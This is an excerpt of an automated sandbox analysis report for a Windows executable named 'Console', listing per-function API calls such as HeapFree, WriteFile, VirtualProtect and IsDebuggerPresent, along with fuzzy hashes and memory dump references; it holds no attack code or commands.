                                                                                                                                                                                                                          • String ID: NULL
                                                                                                                                                                                                                          • API String ID: 3298025750-324932091
                                                                                                                                                                                                                          • Opcode ID: 188fd346534f0adfcae5f95727dee449e083e5a881fd9aa7b2296af0a587c5cb
                                                                                                                                                                                                                          • Instruction ID: 715d79cc380bcd2718acf036ab86c9dbb2a1978b520550c648919f620e9cbd00
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 188fd346534f0adfcae5f95727dee449e083e5a881fd9aa7b2296af0a587c5cb
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 01327E70D106299FDF31CF24DC84BDABBB9AF59704F4402EAEA09A7251D7309A95CF90
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • strcpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00000003,00000000), ref: 010957EB
                                                                                                                                                                                                                          • strcpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00000003,00000000), ref: 0109591B
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?), ref: 01095A45
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?), ref: 01095A6E
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,00000000,7CAB6A82,?,?), ref: 01095BEE
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,00000000,7CAB6A82,?,?), ref: 01095CB3
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,00000000,7CAB6A82,?,?), ref: 01095DFA
                                                                                                                                                                                                                            • Part of subcall function 01215D00: GetProcessHeap.KERNEL32(00000002,00FCFE3B,00000002,?,00000002,00FCF1D3,80131623,?,?,7CAB6A82,00000002), ref: 01215D0C
                                                                                                                                                                                                                            • Part of subcall function 01215D00: RtlAllocateHeap.NTDLL(03BF0000,00000000,?,00000002,00FCFE3B,00000002,?,00000002,00FCF1D3,80131623,?,?,7CAB6A82), ref: 01215D28
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,00000000,00000004), ref: 01095EF3
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heap$Free$strcpy_s$AllocateProcess
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2599166571-0
                                                                                                                                                                                                                          • Opcode ID: 2301600b1ab3dd63fdff3ef9333f5de4e5514a99b73861b860f7f448be485298
                                                                                                                                                                                                                          • Instruction ID: f7c7ebfd2dde8c9c1a0ad37f9344700823aa21dccc424828f36363675e54db4e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2301600b1ab3dd63fdff3ef9333f5de4e5514a99b73861b860f7f448be485298
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E03249B19012289BDF66CF29CC55BE9BBF4AF09310F0441DAE989A7390DB705E94DF90
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,010D4669), ref: 012C988D
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,010D4669), ref: 012C9920
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 012C99B0
                                                                                                                                                                                                                            • Part of subcall function 01215D50: GetProcessHeap.KERNEL32(7CAB6A82,00000000,00000000,014B5000,000000FF,?,0122A0F5), ref: 01215D7E
                                                                                                                                                                                                                            • Part of subcall function 01215D50: RtlAllocateHeap.NTDLL(03BF0000,00000000,00000030,7CAB6A82,00000000,00000000,014B5000,000000FF,?,0122A0F5), ref: 01215D9A
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 012C99EB
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,010D4669), ref: 012C9B17
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 012C9BF2
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 012C9C09
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heap$Free$AllocateProcess
                                                                                                                                                                                                                          • String ID: NULL
                                                                                                                                                                                                                          • API String ID: 1264717999-324932091
                                                                                                                                                                                                                          • Opcode ID: a51c8824a1a43ae4a564e95c4876bbbf125ed7441ccb3ca79fe3a8e577f48c16
                                                                                                                                                                                                                          • Instruction ID: 71b8e04c5ffd9a2bf8d042cbc9685bcd6c7008d81b96fd6f56cdc13bf1655105
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a51c8824a1a43ae4a564e95c4876bbbf125ed7441ccb3ca79fe3a8e577f48c16
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FAD19E70E102099FDF21CF79D954B9EB7B8AF18744F50422EEA09EB251EB309991CF90
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • strcpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00000003,00000000,0150E144,?), ref: 0116B89C
                                                                                                                                                                                                                            • Part of subcall function 01223C50: HeapFree.KERNEL32(00000000,?,?,?), ref: 01223D68
                                                                                                                                                                                                                          • strcpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00000003,00000000,0150E144,?), ref: 0116B96A
                                                                                                                                                                                                                          • strcpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00000003,00000000,0150E144,?), ref: 0116BA91
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,00000000,?,?,?,0159B9F0,?,?,?,?,?,?,?,00000000), ref: 0116C09E
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,00000000,?,?,?,0159B9F0,?,?,?,?,?,?,?,00000000), ref: 0116C0C4
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,00000000,?,?,?,0159B9F0,?,?,?,?,?,?,?,00000000), ref: 0116C0ED
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap$strcpy_s
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2606610500-0
                                                                                                                                                                                                                          • Opcode ID: d0aa15be6abd80756f993976d561a4b2b632f683db2ad8f8a74a496a89c0ebd3
                                                                                                                                                                                                                          • Instruction ID: 070396d6683d0cc29173d1d533ffa89c5696f633f5826785dcbc6babcbad51cd
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d0aa15be6abd80756f993976d561a4b2b632f683db2ad8f8a74a496a89c0ebd3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 02524DB19042289FEF258F14CC44BE9BBBAFB85314F0042D9E54DA7290DB325EA4DF55
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • strcpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00000003,00000000,7CAB6A82,?,?), ref: 00FF3604
                                                                                                                                                                                                                          • strcpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00000003,00000000,7CAB6A82,?,?), ref: 00FF3746
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,7CAB6A82,?,?), ref: 00FF37EF
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00FF37FB
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 00FF38F7
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 00FF3920
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeapstrcpy_sstrlen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2476811093-0
                                                                                                                                                                                                                          • Opcode ID: e51be05d7c464923bb390e605ed9c2332906ed5ddd35f0cf64ea3ab15a691421
                                                                                                                                                                                                                          • Instruction ID: 581d592ff70242a1244546f5ea4bf6f0331ac565e38ae2886f015ac28a28908c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e51be05d7c464923bb390e605ed9c2332906ed5ddd35f0cf64ea3ab15a691421
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0CC17AF19002589BDB20CF24CC89BEDBBB4AF19314F4441D8EA09AB291DB755F88CF59
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 01215D50: GetProcessHeap.KERNEL32(7CAB6A82,00000000,00000000,014B5000,000000FF,?,0122A0F5), ref: 01215D7E
                                                                                                                                                                                                                            • Part of subcall function 01215D50: RtlAllocateHeap.NTDLL(03BF0000,00000000,00000030,7CAB6A82,00000000,00000000,014B5000,000000FF,?,0122A0F5), ref: 01215D9A
                                                                                                                                                                                                                          • CreateSemaphoreExW.KERNEL32(00000000,00000000,7FFFFFFF,00000000,00000000,02100002,7CAB6A82,00000000,?), ref: 0127DCC1
                                                                                                                                                                                                                          • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 0127DCDB
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0127DD08
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0127DD15
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0127DD71
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0127DD7E
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseHandle$CreateHeap$AllocateEventProcessSemaphore
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 9831839-0
                                                                                                                                                                                                                          • Opcode ID: 11e5881ab59fe5c897f54a5b60eba0f4f1a6c8e30f040061010132d160c6d1bb
                                                                                                                                                                                                                          • Instruction ID: 46f748684b6154a387cd2edcc109768ef978dddfc1962381401e0ae7a08411df
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 11e5881ab59fe5c897f54a5b60eba0f4f1a6c8e30f040061010132d160c6d1bb
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7E91ACB1A1530A9BEB21CFA9C8047AFBBF0FF54720F14461ED925A73D0E7B599008B94
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,00000000,7CAB6A82,?,?), ref: 01095BEE
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,00000000,7CAB6A82,?,?), ref: 01095CB3
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,00000000,7CAB6A82,?,?), ref: 01095DFA
                                                                                                                                                                                                                            • Part of subcall function 01215D00: GetProcessHeap.KERNEL32(00000002,00FCFE3B,00000002,?,00000002,00FCF1D3,80131623,?,?,7CAB6A82,00000002), ref: 01215D0C
                                                                                                                                                                                                                            • Part of subcall function 01215D00: RtlAllocateHeap.NTDLL(03BF0000,00000000,?,00000002,00FCFE3B,00000002,?,00000002,00FCF1D3,80131623,?,?,7CAB6A82), ref: 01215D28
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,00000000,00000004), ref: 01095EF3
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heap$Free$AllocateProcess
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1264717999-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000400,00000000,00000000,?,?,?,?,01417248,?,7CAB6A82), ref: 01417BFF
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,01417248,?,7CAB6A82), ref: 01417C3B
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(7CAB6A82,00000000,00000000,?,?,?,?,01417248,?,7CAB6A82), ref: 01417D39
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,00000020,00000000,00000000,?,?,?,?,01417248,?,7CAB6A82), ref: 01417D68
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: free$malloc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2190258309-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • VirtualProtect.KERNEL32(?,?,00000000,?,?,00000000,?), ref: 0141A7EC
                                                                                                                                                                                                                          • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0141A86E
                                                                                                                                                                                                                          • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0141A925
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ProtectVirtual
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 544645111-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetEnabledXStateFeatures.KERNEL32(00000000,00000048,?,?,0141332E,00000000,00000048,?), ref: 014A94D9
                                                                                                                                                                                                                          • GetEnabledXStateFeatures.KERNEL32(?,0141332E,00000000,00000048,?), ref: 014A954F
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: EnabledFeaturesState
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1557480591-0
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • System.Runtime.CompilerServices.PreserveBaseOverridesAttribute, xrefs: 00FEABA7
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: System.Runtime.CompilerServices.PreserveBaseOverridesAttribute
                                                                                                                                                                                                                          • API String ID: 0-2910636169
                                                                                                                                                                                                                          • Opcode ID: 197c15ba596ae6041dc1e10b5a75937782cb413ff02bb39d8d745cc6e75c8434
                                                                                                                                                                                                                          • Instruction ID: ca61ecb08e228d465427e547dbcbb666270be0375d5fc2c64acee0acdec819db
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 197c15ba596ae6041dc1e10b5a75937782cb413ff02bb39d8d745cc6e75c8434
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9E329071E002589FDB18DF69C891BFEB7B5BF48310F144169E816AB391DB38AD01DBA1
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CreateGuid
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2531319410-0
                                                                                                                                                                                                                          • Opcode ID: 346b86255a930b9388d77ede410da6dd81622cf56e01a0f364f65289dac4e0eb
                                                                                                                                                                                                                          • Instruction ID: aab5070adcf5af8ad5bc39ffe5af8380ec161c9aadb7d6de4b062bd5ad63f3ed
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 346b86255a930b9388d77ede410da6dd81622cf56e01a0f364f65289dac4e0eb
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 77617972A143818BCB14DF2CC5817A9B7E4EF58314F09467EED48AF291DB70E945C792
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,01063F1F,?,?), ref: 01067CAE
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3298025750-0
                                                                                                                                                                                                                          • Opcode ID: a9e455b89fe129166a3bcba87a04909d1b26f59e92f84d55d18e3cd7eef334c8
                                                                                                                                                                                                                          • Instruction ID: 01bc02ded2473c08d62a4b43f757ca97bb49630e3628ef154c245165fdc45019
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a9e455b89fe129166a3bcba87a04909d1b26f59e92f84d55d18e3cd7eef334c8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 42B11635A001148FDB28CF6CC8917BDBBF6EB85314F1446AEE996DB295DA309D44CB60
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32(80131506,016371B8), ref: 011852BB
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebuggerPresent
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1347740429-0
                                                                                                                                                                                                                          • Opcode ID: b2e08493be417310f33e72d13c8466f8b37dc59a0da697c53dbefb7ca1f1a381
                                                                                                                                                                                                                          • Instruction ID: 7e201a833e8648d5f6cb41adeace3802f284d4bceb14514db6d6da2d42fe0710
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b2e08493be417310f33e72d13c8466f8b37dc59a0da697c53dbefb7ca1f1a381
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9DF0A730540204C7F77EB9AC780C3653B97F702305F044559EE04C6294FF668464CB82
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 871d84a0581442fd63b7df19c668c6400d4112faf7641d7e46a9f7408f8c3b27
                                                                                                                                                                                                                          • Instruction ID: 9d97403b945eb0f35fbb2b979d4ab1d6822614902bdc6ef0ba2892f9522a0559
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 871d84a0581442fd63b7df19c668c6400d4112faf7641d7e46a9f7408f8c3b27
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FF228D7160434A8FCB15CF28C880A9EBBE6FF95714F148A5DE9958B346C731E805CBA6
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 05bd10ee878b1c7f9e528b7b5077e3d37c65fa5e04c330ad0ff8613cb6832100
                                                                                                                                                                                                                          • Instruction ID: 74ab9071fa07e47a9bf390567d3edd920d52f9e7b591da1249e8e7b30d133057
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 05bd10ee878b1c7f9e528b7b5077e3d37c65fa5e04c330ad0ff8613cb6832100
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5212DE74E0460A9FDB59CFA8C4887BDFBE2FF48310F18819AC89997391D735A911CB94
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heap$AllocateProcess
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1357844191-0
                                                                                                                                                                                                                          • Opcode ID: 59a3fccb099378106c58c3286b3af603ba6663ce6ce2d88dbaff5ffd7f8d6d1c
                                                                                                                                                                                                                          • Instruction ID: 5f7f1e4d354840bdf4640c843c011685b7a279178b1b3b0dc789469464c23b77
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 59a3fccb099378106c58c3286b3af603ba6663ce6ce2d88dbaff5ffd7f8d6d1c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 02C150B07242216BDF4D976CECA1A3A36DAF798200F501A2CFD57DB2C8DB119C25C795
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 79cfd8f66544b8eb793437f110ad78ce9e358c4de057f07c7a108d763eab56b4
                                                                                                                                                                                                                          • Instruction ID: 9fb253beef8c5817ec6652e86579beaf3385ffe6a9551dbca74b47cf3b18cc99
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 79cfd8f66544b8eb793437f110ad78ce9e358c4de057f07c7a108d763eab56b4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7ED14F51C5CBC996E6138B3D88421E2F3E1BEFA259F19E70AFDA435131EB3162C68741
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: a329d6992bb441cf1f2887e8e5536afff1a855a9d72b4a809cea699ce1e0c99f
                                                                                                                                                                                                                          • Instruction ID: 00bb3515e612ffa77d2b151f865204881b794f4ed0fccef33fb27fea67905bf7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a329d6992bb441cf1f2887e8e5536afff1a855a9d72b4a809cea699ce1e0c99f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 13C10B35910164CFE768CF5EE8C043A7BF1EB8B301746415ADA55EB289C238E619EBE0
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 74fdfae21c4ea310731ef8a176322d8cae93e49d4e083fadc8ca9a9bc8c0ce17
                                                                                                                                                                                                                          • Instruction ID: 6fcaf24d4fe43aa28dbcea298d3329cd0497993d2697eda5eecd8bd59423b543
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 74fdfae21c4ea310731ef8a176322d8cae93e49d4e083fadc8ca9a9bc8c0ce17
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 51917A72E001244FEB14CEBD88513BDFBE2AF85220F59827AD9E6EB281D635D9068750
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 08be4fc48e24642e9783f06dcfae698f8b26d2ba53fafb591dfed3f22b175f8d
                                                                                                                                                                                                                          • Instruction ID: 040757fca13bdbd8d8d3551da96c905a7edbd16af4f55ebf4fbf4f748c852fde
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 08be4fc48e24642e9783f06dcfae698f8b26d2ba53fafb591dfed3f22b175f8d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D8515976A002198FDF08DF59C8906ADF7B6FF89310B19817ED946EB354D730A941CB91
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _swprintf.LIBCMT ref: 0109CAC4
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000), ref: 0109CAD8
                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,00000000), ref: 0109CAED
                                                                                                                                                                                                                          • _swprintf.LIBCMT ref: 0109CB0D
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000), ref: 0109CB21
                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,00000000), ref: 0109CB36
                                                                                                                                                                                                                          • _swprintf.LIBCMT ref: 0109CB56
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000), ref: 0109CB6A
                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,00000000), ref: 0109CB7F
                                                                                                                                                                                                                          • _swprintf.LIBCMT ref: 0109CB9F
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000), ref: 0109CBB3
                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,00000000), ref: 0109CBC8
                                                                                                                                                                                                                          • _swprintf.LIBCMT ref: 0109CBDD
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000), ref: 0109CBF1
                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,00000000), ref: 0109CC06
                                                                                                                                                                                                                          • _swprintf.LIBCMT ref: 0109CC26
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000), ref: 0109CC3A
                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,00000000), ref: 0109CC4F
                                                                                                                                                                                                                          • _swprintf.LIBCMT ref: 0109CC6F
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000), ref: 0109CC83
                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,00000000), ref: 0109CC98
                                                                                                                                                                                                                          • _swprintf.LIBCMT ref: 0109CCB8
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000), ref: 0109CCCC
                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,00000000), ref: 0109CCE1
                                                                                                                                                                                                                          • _swprintf.LIBCMT ref: 0109CD01
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000), ref: 0109CD15
                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,00000000), ref: 0109CD2A
                                                                                                                                                                                                                          • _swprintf.LIBCMT ref: 0109CD58
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000), ref: 0109CD6C
                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,00000000), ref: 0109CD81
                                                                                                                                                                                                                          • _swprintf.LIBCMT ref: 0109CDA1
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000), ref: 0109CDB5
                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,00000000), ref: 0109CDCA
                                                                                                                                                                                                                          • _swprintf.LIBCMT ref: 0109CDEA
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000), ref: 0109CDFE
                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,00000000), ref: 0109CE13
                                                                                                                                                                                                                          • _swprintf.LIBCMT ref: 0109CE6E
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000), ref: 0109CE82
                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,00000000), ref: 0109CE97
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
